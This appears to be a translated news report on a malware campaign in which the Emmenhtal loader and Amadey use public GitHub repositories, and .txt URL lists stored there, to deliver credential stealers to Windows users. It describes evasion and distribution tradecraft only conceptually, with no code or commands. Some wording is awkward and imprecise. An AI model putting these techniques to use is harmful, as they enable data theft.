A sophisticated cyberattack operation is quietly taking place, targeting Windows operating system users directly through a multilayer chain of infection. In this campaign, Amadey malware is used as an intermediate link to deploy a series of malicious code that steals dangerous data. Notably, the attacker used public repositories on GitHub as payload distributions, thereby easily overcoming web filtering mechanisms and traditional defenses. The incident again showed that legitimate platforms, if exploited, could become effective malware spreading tools.
The attack sequence begins with the installation of a malicious code download called Emmenhtal, also known as PEAKLIGHT. The malware was developed in the AutoIt language – common in legal automation tools – making it easy to disguise as harmless software. Emmenhtal was bundled with custom DLL libraries that implemented a variety of avoidance techniques, including monitoring system progress, hiding network traffic, and slowing down security professionals’ analysis. Once executed, Emmenhtal establishes a connection to the remote server, downloads Amadey malicious code, and activates via the mshta.exe utility available in Windows. Taking advantage of the legitimate components of the operating system greatly reduces the risk of being detected by security software.
After being deployed, Amadey did not directly execute complex attack behaviors but acted as an intermediate platform, similar to a “mini-operating system” dedicated to malicious code. Amadey is capable of loading, managing, and activating malicious plugins on demand. Each plugin performs a separate function, ranging from stealing browser login information, extracting email data, collecting FTP and VPN information to real-time screen capture of the user. During the campaign, Amadey was configured to connect directly to public repositories on GitHub to download additional malicious components, rather than using the traditional C2 server infrastructure, which is easily detected and intercepted.
The attack team used at least three publicly available GitHub accounts including Legendary99909, DFfe9ewf, and Milidmdds to store malicious code. These repositories contain multiple executables (.exe), libraries (.dll), and PowerShell scripts, which are used either as extensions to Amadey or as standalone payloads. Particularly dangerous is the emergence of well – known thieves such as Lumma Stealer, RedLine Stealer and Rhadamanthys – tools that specialise in stealing login cookies, browser data, cryptocurrency information and other sensitive data. The integration of these stealers helps the attacker maximize the value extracted from each system that is hacked.
Another notable technique in the campaign was the use of.txt text files on GitHub as a simple remote control panel. These files contain a list of URLs pointing to actual payloads, allowing the attacker the flexibility to change the download sequence without updating the Amadey code installed on the victim’s machine. This approach both helps maintain the ability to coordinate the campaign, and hides the malicious behavior in the form of regular text data, making the process of detection more difficult.
Overall, the campaign showed increasing levels of risk as legitimate platforms such as GitHub were abused for the purpose of spreading malicious code. Exclusive reliance on download sources, based only on the platform’s apparent reputation, can create serious defenses vulnerabilities. This is a clear warning that both individual and institutional users should raise their guard, enhance surveillance of network behavior, and carefully evaluate any files, even if they come from seemingly safe sources.
